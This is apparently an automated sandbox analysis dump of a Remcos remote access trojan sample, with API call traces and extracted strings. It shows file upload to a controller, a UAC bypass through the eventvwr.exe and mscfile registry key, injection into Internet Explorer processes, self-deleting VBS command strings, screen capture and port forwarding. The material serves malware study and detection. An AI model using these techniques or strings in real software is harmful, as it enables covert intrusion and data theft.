                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                                                                    • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                                  • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                                                                  • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                                                                  • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                                                                  • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                                                                  • Sleep.KERNEL32(00000064), ref: 00411C63
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                  • String ID: /stext "$$.F$@#G$@#G
                                                                                  • API String ID: 1223786279-2596709126
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: pF
                                                                                  • API String ID: 269201875-2973420481
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                                                                    • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                                                                  • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                                                                  • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                                                                  • API String ID: 193334293-3226144251
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEnumOpen
                                                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                  • API String ID: 1332880857-3714951968
                                                                                  APIs
                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                                                                  • GetCursorPos.USER32(?), ref: 0041B39E
                                                                                  • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                                                                  • ExitProcess.KERNEL32 ref: 0041B41A
                                                                                  • CreatePopupMenu.USER32 ref: 0041B420
                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                  • String ID: Close
                                                                                  • API String ID: 1657328048-3535843008
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$Info
                                                                                  • String ID:
                                                                                  • API String ID: 2509303402-0
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                                                                  • __aulldiv.LIBCMT ref: 00407D89
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408038
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                  • API String ID: 3086580692-2596673759
                                                                                  APIs
                                                                                    • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                                    • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                                    • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
                                                                                    • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
                                                                                    • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                                                                  • ExitProcess.KERNEL32 ref: 0040C57D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                  • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                                                                  • API String ID: 1913171305-2600661426
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 65535$udp
                                                                                  • API String ID: 0-1267037602
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                                                                  • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                                                                  • __dosmaperr.LIBCMT ref: 00438646
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                                                                  • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                                                                  • __dosmaperr.LIBCMT ref: 00438683
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                                                                  • __dosmaperr.LIBCMT ref: 004386D7
                                                                                  • _free.LIBCMT ref: 004386E3
                                                                                  • _free.LIBCMT ref: 004386EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                  • String ID:
                                                                                  • API String ID: 2441525078-0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: pF$tF
                                                                                  • API String ID: 269201875-2954683558
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?), ref: 0040549F
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                                                                  • TranslateMessage.USER32(?), ref: 0040555E
                                                                                  • DispatchMessageA.USER32(?), ref: 00405569
                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                  • API String ID: 2956720200-749203953
                                                                                  APIs
                                                                                    • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416123
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                  • String ID: <$@$@%G$@%G$Temp
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                                                                  • ExitProcess.KERNEL32 ref: 00406782
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExecuteExitProcessShell
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00445645
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 00445651
                                                                                  • _free.LIBCMT ref: 0044565C
                                                                                  • _free.LIBCMT ref: 00445667
                                                                                  • _free.LIBCMT ref: 00445672
                                                                                  • _free.LIBCMT ref: 0044567D
                                                                                  • _free.LIBCMT ref: 00445688
                                                                                  • _free.LIBCMT ref: 00445693
                                                                                  • _free.LIBCMT ref: 0044569E
                                                                                  • _free.LIBCMT ref: 004456AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00417F6F
                                                                                  • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                                                                  • Sleep.KERNEL32(000003E8), ref: 004180B3
                                                                                  • GetLocalTime.KERNEL32(?), ref: 004180BB
                                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                  APIs
                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DecodePointer
                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                  • Sleep.KERNEL32(00000064), ref: 00415A46
                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                  APIs
                                                                                  • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocConsoleShowWindow
                                                                                  • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                                                                    • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                                    • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                                    • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                                                                  • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                                                                  • TranslateMessage.USER32(?), ref: 0041B29E
                                                                                  • DispatchMessageA.USER32(?), ref: 0041B2A8
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                  • String ID: Remcos
                                                                                  APIs
                                                                                    • Part of subcall function 00452A89: CreateFileW.KERNEL32(00000000,00000000,?,00452E64,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                                                                  • __dosmaperr.LIBCMT ref: 00452ED6
                                                                                  • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                                                                  • __dosmaperr.LIBCMT ref: 00452EF5
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                                                                  • GetLastError.KERNEL32 ref: 00453091
                                                                                  • __dosmaperr.LIBCMT ref: 00453098
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                                                                                  • __alloca_probe_16.LIBCMT ref: 004510CA
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                                                                                  • __alloca_probe_16.LIBCMT ref: 00451174
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                                                                                  • __freea.LIBCMT ref: 004511E3
                                                                                  • __freea.LIBCMT ref: 004511EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • _memcmp.LIBVCRUNTIME ref: 00442935
                                                                                  • _free.LIBCMT ref: 004429A6
                                                                                  • _free.LIBCMT ref: 004429BF
                                                                                  • _free.LIBCMT ref: 004429F1
                                                                                  • _free.LIBCMT ref: 004429FA
                                                                                  • _free.LIBCMT ref: 00442A06
                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                  • String ID: C
                                                                                  Strings
                                                                                  • String ID: tcp$udp
                                                                                  APIs
                                                                                  • API ID: Eventinet_ntoa
                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                                                                    • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00471E90,00404C29,00000000,?,?,?,00471E90,?), ref: 00404B85
                                                                                    • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                  • String ID: .part
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 0044701E
                                                                                  • __alloca_probe_16.LIBCMT ref: 00447056
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 004470A4
                                                                                  • __alloca_probe_16.LIBCMT ref: 0044713B
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                                                                  • __freea.LIBCMT ref: 004471AB
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  • __freea.LIBCMT ref: 004471B4
                                                                                  • __freea.LIBCMT ref: 004471D9
                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                  APIs
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
